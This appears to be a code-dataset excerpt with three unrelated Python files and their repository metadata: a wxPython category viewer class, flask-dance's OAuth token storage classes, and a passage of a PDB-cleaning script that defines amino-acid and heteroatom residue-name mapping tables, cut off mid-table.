super(BaseCategoryViewer, self).onAttributeChanged(event)
def onCheck(self, event):
categoryToFilter = self.widget.GetItemPyData(event.GetItem())
categoryToFilter.setFiltered(event.GetItem().IsChecked())
self.onSelect(event) # Notify status bar
def getIsItemChecked(self, item):
if isinstance(item, category.Category):
return item.isFiltered()
return False
def getItemParentHasExclusiveChildren(self, item):
parent = item.parent()
return parent and parent.hasExclusiveSubcategories()
def isShowingCategories(self):
return True
def statusMessages(self):
status1 = _('Categories: %d selected, %d total')%\
(len(self.curselection()), len(self.presentation()))
filteredCategories = self.presentation().filteredCategories()
status2 = _('Status: %d filtered')%len(filteredCategories)
return status1, status2
def itemEditorClass(self):
return dialog.editor.CategoryEditor
def newItemCommandClass(self):
return command.NewCategoryCommand
def editItemCommandClass(self):
return command.EditCategoryCommand
def newSubItemCommandClass(self):
return command.NewSubCategoryCommand
def deleteItemCommandClass(self):
return command.DeleteCategoryCommand
class CategoryViewer(BaseCategoryViewer):
def __init__(self, *args, **kwargs):
super(CategoryViewer, self).__init__(*args, **kwargs)
self.filterUICommand.setChoice(self.settings.getboolean('view',
'categoryfiltermatchall'))
def getToolBarUICommands(self):
''' UI commands to put on the toolbar of this viewer. '''
toolBarUICommands = super(CategoryViewer, self).getToolBarUICommands()
toolBarUICommands.insert(-2, None) # Separator
# pylint: disable-msg=W0201
self.filterUICommand = \
uicommand.CategoryViewerFilterChoice(settings=self.settings)
toolBarUICommands.insert(-2, self.filterUICommand)
return toolBarUICommands
|
gpl-3.0
| 5,805,815,929,631,619,000
| 46.066667
| 117
| 0.622285
| false
| 4.833409
| false
| false
| false
|
singingwolfboy/flask-dance
|
flask_dance/consumer/storage/__init__.py
|
1
|
1267
|
from abc import ABCMeta, abstractmethod
class BaseStorage(metaclass=ABCMeta):
@abstractmethod
def get(self, blueprint):
return None
@abstractmethod
def set(self, blueprint, token):
return None
@abstractmethod
def delete(self, blueprint):
return None
class NullStorage(BaseStorage):
"""
This mock storage will never store OAuth tokens.
If you try to retrieve a token from this storage, you will always
get ``None``.
"""
def get(self, blueprint):
return None
def set(self, blueprint, token):
return None
def delete(self, blueprint):
return None
class MemoryStorage(BaseStorage):
"""
This mock storage stores an OAuth token in memory and so that it can
be retrieved later. Since the token is not persisted in any way,
this is mostly useful for writing automated tests.
The initializer accepts a ``token`` argument, for setting the
initial value of the token.
"""
def __init__(self, token=None, *args, **kwargs):
self.token = token
def get(self, blueprint):
return self.token
def set(self, blueprint, token):
self.token = token
def delete(self, blueprint):
self.token = None
|
mit
| 1,565,694,463,115,637,000
| 22.036364
| 72
| 0.648777
| false
| 4.508897
| false
| false
| false
|
schenc3/InteractiveROSETTA
|
InteractiveROSETTA/scripts/io_tools/process_pdb.py
|
1
|
117335
|
#!/usr/bin/env python
# :noTabs=true:
"""
create a directory of the contents in a PDB
splits into chains, grouped chains (pairings parsed from the header),
individual HETATM PDB lines, sequence files (FASTA), etc.
verbosely:
This method behaves slightly differently for PDB files with multiple models,
nucleic acids, duplicate complexes, etc.
so if you are interested in the specifics, please read the source code
In short, it tries to write:
header.txt a text file of the header lines
numbering_map.txt a text file showing 1-indexed PDB numbering
clean.pdb only ATOM lines
hetatm.pdb only HETATM lines, may be split by resName
.fa sequences of all peptides and nucleic acids
subdirectories for each protein model/subunit (similar info)
does not write a text file for the "trailer" (lines after the coordinates)
converts lines (ATOM or HETATM) that can be converted based on <conversion>
(generally) and <na_conversion> (specific for nucleic acids, relevant
because RNA and DNA may require different treatment...)
!!!WARNING!!! defaults:
CSE CYS converts SelenoCysteinE to Cysteine
HYP PRO converts HYdroxylProline to Proline
CYD CYS does NOT convert "CYsteine Disulfides to Cysteine"
HIP HIS converts "HIP" to Histidine (~double protonation)
HID HIS converts "HID" to Histidine (~single delta N proton)
HIE HIS converts "HIE" to Histidine (~single epsilon N proton)
todo:
ensure hetatm conversions step, illegal atoms!!!!
alternate conformations (mostly supported now)
convert DNA to Rosetta DNA
convert ligands to params
convert water to TP3 (or TP5)
Methods for cleaning and parsing PDB files
Most importantly, the process_pdb method does a lot to clean PDB files
from RCSB
Requires:
Biopython
Author: Evan H. Baugh
"""
################################################################################
# IMPORT
# common modules
import optparse # for commandline
import os
import shutil
# bigger modules
from Bio.Alphabet import IUPAC
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.PDB import PDBIO
from Bio.PDB import PDBParser
from Bio.PDB import PPBuilder # no longer used, much faster way to do this
#from Bio.PDB import Select # no longer used...kinda hard to use
from Bio.PDB.Structure import Structure
from Bio.PDB.Model import Model
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
# custom modules
#from helper import get_root_filename , create_directory , copy_file
#from settings import SEQFORMAT , SEQFORMAT_EXTENSION_MAP , NUCLEIC_SEQUENCE_LETTERS_MAP , NA_CODES , three2one , WATER_CONVERSION , one2three , three2three , NA_CONVERSIONS_ROSETTA
#from biopython_settings import DNAAlphabet , ProteinAlphabet
#from seq_basics import write_sequence , get_sequence
################################################################################
# SETTINGS
# unholy settings...too many...
SEQFORMAT = 'fasta'
SEQFORMAT_EXTENSION_MAP = {
'fasta' : 'fa' ,
'genbank' : 'gb' ,
'clustal' : 'aln' ,
'stockholm' : 'ann'
}
# mapping for sequence file extensions
# update when you start using something new
SEQFORMAT_MAP = {
'fa' : 'fasta' ,
'fas' : 'fasta' ,
'fasta' : 'fasta' ,
'gbk' : 'genbank' ,
'gb' : 'genbank' ,
'aln' : 'clustal' ,
'ann' : 'stockholm' , # Pfam uses these
'pir' : 'pir' , # used by Modeller...
'sp' : 'swiss' # uniprot/swissprot
}
# Biopython Alphabets
DNAAlphabet = IUPAC.unambiguous_dna # requires Biopython
ProteinAlphabet = IUPAC.protein # requires Biopython
# simple amino acid mapping
one2three = {
'A':'ALA',
'C':'CYS',
'D':'ASP',
'E':'GLU',
'F':'PHE',
'G':'GLY',
'H':'HIS',
'I':'ILE',
'K':'LYS',
'L':'LEU',
'M':'MET',
'N':'ASN',
'P':'PRO',
'Q':'GLN',
'R':'ARG',
'S':'SER',
'T':'THR',
'V':'VAL',
'W':'TRP',
'Y':'TYR',
}
# the revers of above...maybe more?
three2one = {
'ALA':'A',
'CYS':'C',
'ASP':'D',
'GLU':'E',
'PHE':'F',
'GLY':'G',
'HIS':'H',
'ILE':'I',
'LYS':'K',
'LEU':'L',
'MET':'M',
'ASN':'N',
'PRO':'P',
'GLN':'Q',
'ARG':'R',
'SER':'S',
'THR':'T',
'VAL':'V',
'TRP':'W',
'TYR':'Y',
# pseudo-standard 3 letter codes for the standard aa
'CYD' : 'C' ,
'CYZ' : 'C' ,
'HID' : 'H' ,
'HIE' : 'H' ,
'HIP' : 'H' ,
# just to be sure...
'ala':'A',
'cys':'C',
'asp':'D',
'glu':'E',
'phe':'F',
'gly':'G',
'his':'H',
'ile':'I',
'lys':'K',
'leu':'L',
'met':'M',
'asn':'N',
'pro':'P',
'gln':'Q',
'arg':'R',
'ser':'S',
'thr':'T',
'val':'V',
'trp':'W',
'tyr':'Y',
'Ala':'A',
'Cys':'C',
'Asp':'D',
'Glu':'E',
'Phe':'F',
'Gly':'G',
'His':'H',
'Ile':'I',
'Lys':'K',
'Leu':'L',
'Met':'M',
'Asn':'N',
'Pro':'P',
'Gln':'Q',
'Arg':'R',
'Ser':'S',
'Thr':'T',
'Val':'V',
'Trp':'W',
'Tyr':'Y',
}
###################
# HETATM CONVERSION
# unsure about these...may include ATOM or HETATM lines...
#from http://astral.stanford.edu/scopseq-1.55/release-notes-1.55.txt
three2three = {
'AIB' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'ALA' : 'ALA' , # ALA
'ALM' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'AYA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'BNN' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'CHG' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'CSD' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'DAL' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'DHA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'DNP' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'FLA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'HAC' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'PRR' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'MAA' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'TIH' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'TPQ' : 'ALA' , # HETEROATOM THAT MAY BE TREATED AS ALA
'0CS':'ALA', ## 0CS ALA 3-[(S)-HYDROPEROXYSULFINYL]-L-ALANINE
'2BU':'ALA', ## 2BU ADE
'2OP':'ALA', ## 2OP (2S 2-HYDROXYPROPANAL
'4F3':'ALA', ## 4F3 ALA CYCLIZED
'AA4':'ALA', ## AA4 ALA 2-AMINO-5-HYDROXYPENTANOIC ACID
'ABA':'ALA', ## ABA ALA ALPHA-AMINOBUTYRIC ACID
'AHO':'ALA', ## AHO ALA N-ACETYL-N-HYDROXY-L-ORNITHINE
'AHP':'ALA', ## AHP ALA 2-AMINO-HEPTANOIC ACID
'AIB':'ALA', ## AIB ALA ALPHA-AMINOISOBUTYRIC ACID
'ALA':'ALA', ## ALA ALA
'ALC':'ALA', ## ALC ALA 2-AMINO-3-CYCLOHEXYL-PROPIONIC ACID
'ALM':'ALA', ## ALM ALA 1-METHYL-ALANINAL
'ALN':'ALA', ## ALN ALA NAPHTHALEN-2-YL-3-ALANINE
'ALS':'ALA', ## ALS ALA 2-AMINO-3-OXO-4-SULFO-BUTYRIC ACID
'ALT':'ALA', ## ALT ALA THIOALANINE
'AP7':'ALA', ## AP7 ADE
'APH':'ALA', ## APH ALA P-AMIDINOPHENYL-3-ALANINE
'AYA':'ALA', ## AYA ALA N-ACETYLALANINE
'AYG':'ALA', ## AYG ALA
'B2A':'ALA', ## B2A ALA ALANINE BORONIC ACID
'B3A':'ALA', ## B3A ALA (3S)-3-AMINOBUTANOIC ACID
'BAL':'ALA', ## BAL ALA BETA-ALANINE
'BNN':'ALA', ## BNN ALA ACETYL-P-AMIDINOPHENYLALANINE
'C12':'ALA', ## C12 ALA
'C99':'ALA', ## C99 ALA
'CAB':'ALA', ## CAB ALA 4-CARBOXY-4-AMINOBUTANAL
'CH6':'ALA', ## CH6 ALA
'CH7':'ALA', ## CH7 ALA
'CLB':'ALA', ## CLB ALA
'CLD':'ALA', ## CLD ALA
'CLV':'ALA', ## CLV ALA
'CQR':'ALA', ## CQR ALA
'CR2':'ALA', ## CR2 ALA POST-TRANSLATIONAL MODIFICATION
'CR5':'ALA', ## CR5 ALA
'CR7':'ALA', ## CR7 ALA
'CR8':'ALA', ## CR8 ALA
'CRK':'ALA', ## CRK ALA
'CRW':'ALA', ## CRW ALA
'CRX':'ALA', ## CRX ALA
'CSI':'ALA', ## CSI ALA
'CSY':'ALA', ## CSY ALA MODIFIED TYROSINE COMPLEX
'CWR':'ALA', ## CWR ALA
'DAB':'ALA', ## DAB ALA 2,4-DIAMINOBUTYRIC ACID
'DAL':'ALA', ## DAL ALA D-ALANINE
'DAM':'ALA', ## DAM ALA N-METHYL-ALPHA-BETA-DEHYDROALANINE
'DBU':'ALA', ## DBU ALA (2E)-2-AMINOBUT-2-ENOIC ACID
'DBZ':'ALA', ## DBZ ALA 3-(BENZOYLAMINO)-L-ALANINE
'DHA':'ALA', ## DHA ALA 2-AMINO-ACRYLIC ACID
'DPP':'ALA', ## DPP ALA DIAMMINOPROPANOIC ACID
'FGL':'ALA', ## FGL ALA 2-AMINOPROPANEDIOIC ACID
'DYG':'ALA', ## DYG ALA
'GMU':'ALA', ## GMU 5MU
'HHK':'ALA', ## HHK ALA (2S)-2,8-DIAMINOOCTANOIC ACID
'HMF':'ALA', ## HMF ALA 2-AMINO-4-PHENYL-BUTYRIC ACID
'IAM':'ALA', ## IAM ALA 4-[(ISOPROPYLAMINO)METHYL]PHENYLALANINE
'IGL':'ALA', ## IGL ALA ALPHA-AMINO-2-INDANACETIC ACID
'KYN':'ALA', ## KYN ALA KYNURENINE
'LAL':'ALA', ## LAL ALA N,N-DIMETHYL-L-ALANINE
'MAA':'ALA', ## MAA ALA N-METHYLALANINE
'MDO':'ALA', ## MDO ALA
'MFC':'ALA', ## MFC ALA CYCLIZED
'NAL':'ALA', ## NAL ALA BETA-(2-NAPHTHYL)-ALANINE
'NAM':'ALA', ## NAM ALA NAM NAPTHYLAMINOALANINE
'NCB':'ALA', ## NCB ALA CHEMICAL MODIFICATION
'NRQ':'ALA', ## NRQ ALA
'NYC':'ALA', ## NYC ALA
'ORN':'ALA', ## ORN ALA ORNITHINE
'PIA':'ALA', ## PIA ALA FUSION OF ALA 65, TYR 66, GLY 67
'PRR':'ALA', ## PRR ALA 3-(METHYL-PYRIDINIUM)ALANINE
'PYA':'ALA', ## PYA ALA 3-(1,10-PHENANTHROL-2-YL)-L-ALANINE
'PYC':'ALA', ## PYC ALA PYRROLE-2-CARBOXYLATE
'PYT':'ALA', ## PYT ALA MODIFIED ALANINE
'RC7':'ALA', ## RC7 ALA
'SEC':'ALA', ## SEC ALA 2-AMINO-3-SELENINO-PROPIONIC ACID
'SIC':'ALA', ## SIC ALA
'SUI':'ALA', ## SUI ALA
'TIH':'ALA', ## TIH ALA BETA(2-THIENYL)ALANINE
'TPQ':'ALA', ## TPQ ALA 2,4,5-TRIHYDROXYPHENYLALANINE
'UMA':'ALA', ## UMA ALA
'X9Q':'ALA', ## X9Q ALA
'XXY':'ALA', ## XXY ALA
'XYG':'ALA', ## XYG ALA
# 'ASX' : 'B' , # why is this here!?
'BCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'BUC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'C5C' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'C6C' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CEA' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CME' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSO' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSP' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSX' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CSW' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CY1' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CY3' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CYG' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CYM' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'CYS' : 'CYS' , # CYS
'CYQ' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'DCY' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'EFC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'OCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'PEC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'PR3' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SCH' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SCS' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SCY' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SHC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SMC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'SOC' : 'CYS' , # HETEROATOM THAT MAY BE TREATED AS CYS
'5CS':'CYS', ## 5CS CYS
'AGT':'CYS', ## AGT CYS AGMATINE-CYSTEINE ADDUCT
'BBC':'CYS', ## BBC CYS
'BCS':'CYS', ## BCS CYS BENZYLCYSTEINE
'BCX':'CYS', ## BCX CYS BETA-3-CYSTEINE
'BPE':'CYS', ## BPE CYS
'BUC':'CYS', ## BUC CYS S,S-BUTYLTHIOCYSTEINE
'C3Y':'CYS', ## C3Y CYS MODIFIED CYSTEINE
'C5C':'CYS', ## C5C CYS S-CYCLOPENTYL THIOCYSTEINE
'C6C':'CYS', ## C6C CYS S-CYCLOHEXYL THIOCYSTEINE
'CAF':'CYS', ## CAF CYS S-DIMETHYLARSINOYL-CYSTEINE
'CAS':'CYS', ## CAS CYS S-(DIMETHYLARSENIC)CYSTEINE
'CCS':'CYS', ## CCS CYS CARBOXYMETHYLATED CYSTEINE
'CME':'CYS', ## CME CYS MODIFIED CYSTEINE
'CML':'CYS', ## CML CYS
'CMT':'CYS', ## CMT CYS O-METHYLCYSTEINE
'CS1':'CYS', ## CS1 CYS S-(2-ANILINYL-SULFANYL)-CYSTEINE
'CS3':'CYS', ## CS3 CYS
'CS4':'CYS', ## CS4 CYS
'CSA':'CYS', ## CSA CYS S-ACETONYLCYSTEIN
'CSB':'CYS', ## CSB CYS CYS BOUND TO LEAD ION
'CSD':'CYS', ## CSD CYS 3-SULFINOALANINE
'CSE':'CYS', ## CSE CYS SELENOCYSTEINE
'CSO':'CYS', ## CSO CYS INE S-HYDROXYCYSTEINE
'CSR':'CYS', ## CSR CYS S-ARSONOCYSTEINE
'CSS':'CYS', ## CSS CYS 1,3-THIAZOLE-4-CARBOXYLIC ACID
'CSU':'CYS', ## CSU CYS CYSTEINE-S-SULFONIC ACID
'CSW':'CYS', ## CSW CYS CYSTEINE-S-DIOXIDE
'CSX':'CYS', ## CSX CYS OXOCYSTEINE
'CSZ':'CYS', ## CSZ CYS S-SELANYL CYSTEINE
'CY0':'CYS', ## CY0 CYS MODIFIED CYSTEINE
'CY1':'CYS', ## CY1 CYS ACETAMIDOMETHYLCYSTEINE
'CY3':'CYS', ## CY3 CYS 2-AMINO-3-MERCAPTO-PROPIONAMIDE
'CY4':'CYS', ## CY4 CYS S-BUTYRYL-CYSTEIN
'CY7':'CYS', ## CY7 CYS MODIFIED CYSTEINE
#'CYD':'CYS', ## CYD CYS
'CYF':'CYS', ## CYF CYS FLUORESCEIN LABELLED CYS380 (P14)
'CYG':'CYS', ## CYG CYS
'CYQ':'CYS', ## CYQ CYS
'CYR':'CYS', ## CYR CYS
'CYS':'CYS', ## CYS CYS
'CZ2':'CYS', ## CZ2 CYS S-(DIHYDROXYARSINO)CYSTEINE
'CZZ':'CYS', ## CZZ CYS THIARSAHYDROXY-CYSTEINE
'DCY':'CYS', ## DCY CYS D-CYSTEINE
'DYS':'CYS', ## DYS CYS
'EFC':'CYS', ## EFC CYS S,S-(2-FLUOROETHYL)THIOCYSTEINE
'FOE':'CYS', ## FOE CYS
'GT9':'CYS', ## GT9 CYS SG ALKYLATED
'GYC':'CYS', ## GYC CYS
'HTI':'CYS', ## HTI CYS
'KOR':'CYS', ## KOR CYS MODIFIED CYSTEINE
'M0H':'CYS', ## M0H CYS S-(HYDROXYMETHYL)-L-CYSTEINE
'MCS':'CYS', ## MCS CYS MALONYLCYSTEINE
'NPH':'CYS', ## NPH CYS
'NYS':'CYS', ## NYS CYS
'OCS':'CYS', ## OCS CYS CYSTEINE SULFONIC ACID
'OCY':'CYS', ## OCY CYS HYDROXYETHYLCYSTEINE
'P1L':'CYS', ## P1L CYS S-PALMITOYL CYSTEINE
'PBB':'CYS', ## PBB CYS S-(4-BROMOBENZYL)CYSTEINE
'PEC':'CYS', ## PEC CYS S,S-PENTYLTHIOCYSTEINE
'PR3':'CYS', ## PR3 CYS INE DTT-CYSTEINE
'PYX':'CYS', ## PYX CYS S-[S-THIOPYRIDOXAMINYL]CYSTEINE
'R1A':'CYS', ## R1A CYS
'R1B':'CYS', ## R1B CYS
'R1F':'CYS', ## R1F CYS
'R7A':'CYS', ## R7A CYS
'RCY':'CYS', ## RCY CYS
'SAH':'CYS', ## SAH CYS S-ADENOSYL-L-HOMOCYSTEINE
'SC2':'CYS', ## SC2 CYS N-ACETYL-L-CYSTEINE
'SCH':'CYS', ## SCH CYS S-METHYL THIOCYSTEINE GROUP
'SCS':'CYS', ## SCS CYS MODIFIED CYSTEINE
'SCY':'CYS', ## SCY CYS CETYLATED CYSTEINE
'SHC':'CYS', ## SHC CYS S-HEXYLCYSTEINE
'SMC':'CYS', ## SMC CYS POST-TRANSLATIONAL MODIFICATION
'SNC':'CYS', ## SNC CYS S-NITROSO CYSTEINE
'SOC':'CYS', ## SOC CYS DIOXYSELENOCYSTEINE
'TEE':'CYS', ## TEE CYS POST-TRANSLATIONAL MODIFICATION
'TNB':'CYS', ## TNB CYS S-(2,3,6-TRINITROPHENYL)CYSTEINE
'TYX':'CYS', ## TYX CYS S-(2-ANILINO-2-OXOETHYL)-L-CYSTEINE
'YCM':'CYS', ## YCM CYS S-(2-AMINO-2-OXOETHYL)-L-CYSTEINE
'2AS' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASA' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASB' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASK' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASL' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'ASP' : 'ASP' , # ASP
'ASQ' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'BHD' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'DAS' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'DSP' : 'ASP' , # HETEROATOM THAT MAY BE TREATED AS ASP
'3MD':'ASP', ## 3MD ASP 2S,3S-3-METHYLASPARTIC ACID
'A0A':'ASP', ## A0A ASP ASPARTYL-FORMYL MIXED ANHYDRIDE
'ACB':'ASP', ## ACB ASP 3-METHYL-ASPARTIC ACID
'AKL':'ASP', ## AKL ASP 3-AMINO-5-CHLORO-4-OXOPENTANOIC ACID
'ASA':'ASP', ## ASA ASP ASPARTIC ALDEHYDE
'ASB':'ASP', ## ASB ASP ASPARTIC ACID-4-CARBOXYETHYL ESTER
'ASI':'ASP', ## ASI ASP L-ISO-ASPARTATE
'ASK':'ASP', ## ASK ASP DEHYDROXYMETHYLASPARTIC ACID
'ASL':'ASP', ## ASL ASP ASPARTIC ACID-4-CARBOXYETHYL ESTER
'ASP':'ASP', ## ASP ASP
'B3D':'ASP', ## B3D ASP 3-AMINOPENTANEDIOIC ACID
'BFD':'ASP', ## BFD ASP ASPARTATE BERYLLIUM FLUORIDE
'BHD':'ASP', ## BHD ASP BETA-HYDROXYASPARTIC ACID
'DAS':'ASP', ## DAS ASP D-ASPARTIC ACID
'DMK':'ASP', ## DMK ASP DIMETHYL ASPARTIC ACID
'IAS':'ASP', ## IAS ASP ASPARTYL GROUP
'OHS':'ASP', ## OHS ASP O-(CARBOXYSULFANYL)-4-OXO-L-HOMOSERINE
'OXX':'ASP', ## OXX ASP OXALYL-ASPARTYL ANHYDRIDE
'PHD':'ASP', ## PHD ASP 2-AMINO-4-OXO-4-PHOSPHONOOXY-BUTYRIC ACID
'SNN':'ASP', ## SNN ASP POST-TRANSLATIONAL MODIFICATION
'5HP' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'CGU' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'DGL' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'GGL' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'GLU' : 'GLU' , # GLU
'GMA' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'PCA' : 'GLU' , # HETEROATOM THAT MAY BE TREATED AS GLU
'AB7':'GLU', ## AB7 GLU ALPHA-AMINOBUTYRIC ACID
'AR4':'GLU', ## AR4 GLU
'B3E':'GLU', ## B3E GLU (3S)-3-AMINOHEXANEDIOIC ACID
'CGU':'GLU', ## CGU GLU CARBOXYLATION OF THE CG ATOM
'DGL':'GLU', ## DGL GLU D-GLU
'GLU':'GLU', ## GLU GLU
'GMA':'GLU', ## GMA GLU 1-AMIDO-GLUTAMIC ACID
'ILG':'GLU', ## ILG GLU GLU LINKED TO NEXT RESIDUE VIA CG
'LME':'GLU', ## LME GLU (3R)-3-METHYL-L-GLUTAMIC ACID
'MEG':'GLU', ## MEG GLU (2S,3R)-3-METHYL-GLUTAMIC ACID
'DAH' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'DPN' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'HPQ' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'PHE' : 'PHE' , # PHE
'PHI' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'PHL' : 'PHE' , # HETEROATOM THAT MAY BE TREATED AS PHE
'1PA':'PHE', ## 1PA PHE PHENYLMETHYLACETIC ACID ALANINE
'23F':'PHE', ## 23F PHE (2Z)-2-AMINO-3-PHENYLACRYLIC ACID
'4PH':'PHE', ## 4PH PHE 4-METHYL-L-PHENYLALANINE
'B2F':'PHE', ## B2F PHE PHENYLALANINE BORONIC ACID
'BIF':'PHE', ## BIF PHE
'CHS':'PHE', ## CHS PHE 4-AMINO-5-CYCLOHEXYL-3-HYDROXY-PENTANOIC AC
'DAH':'PHE', ## DAH PHE 3,4-DIHYDROXYDAHNYLALANINE
'DPH':'PHE', ## DPH PHE DEAMINO-METHYL-PHENYLALANINE
'DPN':'PHE', ## DPN PHE D-CONFIGURATION
'FCL':'PHE', ## FCL PHE 3-CHLORO-L-PHENYLALANINE
'FOG':'PHE', ## FOG PHE PHENYLALANINOYL-[1-HYDROXY]-2-PROPYLENE
'FRF':'PHE', ## FRF PHE PHE FOLLOWED BY REDUCED PHE
'HPE':'PHE', ## HPE PHE HOMOPHENYLALANINE
'HPH':'PHE', ## HPH PHE PHENYLALANINOL GROUP
'HPQ':'PHE', ## HPQ PHE HOMOPHENYLALANINYLMETHANE
'MEA':'PHE', ## MEA PHE N-METHYLPHENYLALANINE
'MTY':'PHE', ## MTY PHE 3-HYDROXYPHENYLALANINE
'NFA':'PHE', ## NFA PHE MODIFIED PHENYLALANINE
'PBF':'PHE', ## PBF PHE PARA-(BENZOYL)-PHENYLALANINE
'PCS':'PHE', ## PCS PHE PHENYLALANYLMETHYLCHLORIDE
'PF5':'PHE', ## PF5 PHE 2,3,4,5,6-PENTAFLUORO-L-PHENYLALANINE
'PFF':'PHE', ## PFF PHE 4-FLUORO-L-PHENYLALANINE
'PHA':'PHE', ## PHA PHE PHENYLALANINAL
'PHE':'PHE', ## PHE PHE
'PHI':'PHE', ## PHI PHE IODO-PHENYLALANINE
'PHL':'PHE', ## PHL PHE L-PHENYLALANINOL
'PHM':'PHE', ## PHM PHE PHENYLALANYLMETHANE
'PM3':'PHE', ## PM3 PHE
'PPN':'PHE', ## PPN PHE THE LIGAND IS A PARA-NITRO-PHENYLALANINE
'PRQ':'PHE', ## PRQ PHE PHENYLALANINE
'PSA':'PHE', ## PSA PHE
'SMF':'PHE', ## SMF PHE 4-SULFOMETHYL-L-PHENYLALANINE
'GL3' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'GLY' : 'GLY' , # GLY
'GLZ' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'GSC' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'MPQ' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'MSA' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'NMC' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'SAR' : 'GLY' , # HETEROATOM THAT MAY BE TREATED AS GLY
'ACY':'GLY', ## ACY GLY POST-TRANSLATIONAL MODIFICATION
'CHG':'GLY', ## CHG GLY CYCLOHEXYL GLYCINE
'CHP':'GLY', ## CHP GLY 3-CHLORO-4-HYDROXYPHENYLGLYCINE
'GHP':'GLY', ## GHP GLY 4-HYDROXYPHENYLGLYCINE
'GL3':'GLY', ## GL3 GLY POST-TRANSLATIONAL MODIFICATION
'GLY':'GLY', ## GLY GLY
'GLZ':'GLY', ## GLZ GLY AMINO-ACETALDEHYDE
'GYS':'GLY', ## GYS GLY
'IPG':'GLY', ## IPG GLY N-ISOPROPYL GLYCINE
'MEU':'GLY', ## MEU GLY O-METHYL-GLYCINE
'MPQ':'GLY', ## MPQ GLY N-METHYL-ALPHA-PHENYL-GLYCINE
'MSA':'GLY', ## MSA GLY (2-S-METHYL) SARCOSINE
'NMC':'GLY', ## NMC GLY N-CYCLOPROPYLMETHYL GLYCINE
'PG9':'GLY', ## PG9 GLY D-PHENYLGLYCINE
'SAR':'GLY', ## SAR GLY SARCOSINE
'SHP':'GLY', ## SHP GLY (4-HYDROXYMALTOSEPHENYL)GLYCINE
'TBG':'GLY', ## TBG GLY T-BUTYL GLYCINE
'3AH' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'DHI' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'HIC' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'HIS' : 'HIS' , # HIS
'MHS' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'NEM' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
'NEP' : 'HIS' , # HETEROATOM THAT MAY BE TREATED AS HIS
